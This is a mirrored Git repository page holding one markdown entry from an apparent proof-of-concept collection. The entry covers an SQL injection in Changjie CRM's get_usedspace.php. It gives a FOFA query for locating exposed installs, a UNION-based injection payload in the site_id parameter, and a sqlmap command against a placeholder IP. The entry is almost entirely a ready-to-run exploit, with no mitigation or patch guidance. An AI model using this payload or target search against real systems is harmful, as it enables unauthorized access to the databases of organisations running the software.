admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

37 lines
619 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 畅捷CRM get_usedspace.php SQL注入漏洞
## 漏洞描述
畅捷CRM get_usedspace.php存在SQL漏洞通过漏洞可获取数据库敏感信息
## 漏洞影响
```
畅捷CRM
```
## FOFA
```
title="畅捷CRM"
```
## 漏洞复现
登录页面
![image-20220525145239822](./images/202205251452933.png)
验证POC
```
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
```
![image-20220525145324633](./images/202205251453704.png)
使用Sqlmap验证漏洞
```
sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id
```
Reference in New Issue View Git Blame Copy Permalink